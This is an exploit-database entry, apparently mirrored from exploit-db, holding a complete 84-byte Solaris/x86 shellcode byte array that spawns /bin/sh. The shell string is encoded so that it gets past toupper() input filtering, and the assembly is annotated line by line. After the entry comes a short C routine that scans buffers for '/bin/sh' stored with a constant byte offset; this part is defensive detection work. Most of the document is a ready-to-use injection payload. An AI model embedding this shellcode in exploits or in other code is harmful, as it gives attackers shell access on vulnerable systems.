Solaris/x86 – execve(/bin/sh) ToUpper Encoded Shellcode (84 bytes)

Vulnerability ID: 1054636    Vulnerability type:
Published: 2004-09-26    Updated: 2004-09-26
CVE ID: N/A
CNNVD-ID: N/A
Platform: Solaris_x86    CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/13501
|Vulnerability details
Vulnerability details have not been disclosed.
|Exploit
/* 
 *  Solaris/x86
 *
 *  Used for toupper() evasion (look to the linux version for an 
 *  explanation and usage example). 
 */
 
char c0de[] = 
/* main: */
"\xeb\x33"                                /* jmp callz                */
/* start: */
"\x5e"                                    /* popl %esi                */
"\x8d\x06"                                /* leal (%esi), %eax        */
"\x29\xc9"                                /* subl %ecx, %ecx          */
"\x89\xf3"                                /* movl %esi, %ebx          */
"\x89\x5e\x08"                            /* movl %ebx, 0x08(%esi)    */
"\xb1\x07"                                /* movb $0x07, %cl          */
/* loopz: */
"\x80\x03\x20"                            /* addb $0x20, (%ebx)       */
"\x43"                                    /* incl %ebx                */
"\xe0\xfa"                                /* loopne loopz             */
"\x93"                                    /* xchgl %eax, %ebx         */
"\x29\xc0"                                /* subl %eax, %eax          */
"\x89\x5e\x0b"                            /* movl %ebx, 0x0b(%esi)    */
"\x29\xd2"                                /* subl %edx, %edx          */
"\x88\x56\x19"                            /* movb %dl, 0x19(%esi)     */
"\x89\x56\x07"                            /* movl %edx, 0x07(%esi)    */
"\x89\x56\x0f"                            /* movl %edx, 0x0f(%esi)    */
"\x89\x56\x14"                            /* movl %edx, 0x14(%esi)    */
"\xb0\x3b"                                /* movb $0x3b, %al          */
"\x8d\x4e\x0b"                            /* leal 0x0b(%esi), %ecx    */
"\x89\xca"                                /* movl %ecx, %edx          */
"\x52"                                    /* pushl %edx               */
"\x51"                                    /* pushl %ecx               */
"\x53"                                    /* pushl %ebx               */
"\x50"                                    /* pushl %eax               */
"\xeb\x18"                                /* jmp lcall                */
/* callz: */
"\xe8\xc8\xff\xff\xff"                    /* call start               */

"\x0f\x42\x49\x4e\x0f\x53\x48"            /* /bin/sh -= 0x20          */
"\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03\x03"
/* lcall: */
"\x9a\x04\x04\x04\x04\x07\x04";

# milw0rm.com [2004-09-26]
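
A detection-side view of the "/bin/sh -= 0x20" encoding in the listing above, as an added example that is not part of the original entry: a scanner that finds "/bin/sh" stored with any single constant subtracted from each byte, so a signature for the plaintext string alone is not the only check. The function name, the marker choice and the sample buffer are assumptions made for illustration; the seven encoded bytes in the sample are the data line from the listing.

```c
#include <stddef.h>
#include <stdio.h>

/* Plaintext a decoder stub like the one above rebuilds in memory. */
static const unsigned char MARKER[] = "/bin/sh";
#define MARKER_LEN (sizeof(MARKER) - 1)

/* Constructed sample: padding, then the page's "/bin/sh -= 0x20" bytes. */
static const unsigned char SAMPLE[] = {
    'A', 'A', 'A', 'A',
    0x0f, 0x42, 0x49, 0x4e, 0x0f, 0x53, 0x48,
    0x01, 0x01
};

/*
 * Find MARKER stored with one constant subtracted from every byte
 * (mod 256). Returns the offset of the first hit and writes the
 * constant to *delta (0 means the marker is present in plaintext),
 * or returns -1 when nothing matches.
 */
long find_shifted_marker(const unsigned char *buf, size_t len,
                         unsigned *delta)
{
    for (size_t off = 0; off + MARKER_LEN <= len; off++) {
        /* The first byte fixes the only delta possible at this offset. */
        unsigned char d = (unsigned char)(MARKER[0] - buf[off]);
        size_t i = 1;
        while (i < MARKER_LEN &&
               (unsigned char)(buf[off + i] + d) == MARKER[i])
            i++;
        if (i == MARKER_LEN) {
            *delta = d;
            return (long)off;
        }
    }
    return -1;
}

int main(void)
{
    unsigned delta = 0;
    long off = find_shifted_marker(SAMPLE, sizeof SAMPLE, &delta);
    if (off >= 0)
        printf("marker at offset %ld, additive delta 0x%02x\n", off, delta);
    else
        puts("no shifted marker found");
    return 0;
}
```

A hit with a non-zero delta is a triage signal rather than proof of a payload, since seven bytes with the right spacing can occur by chance in binary data.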
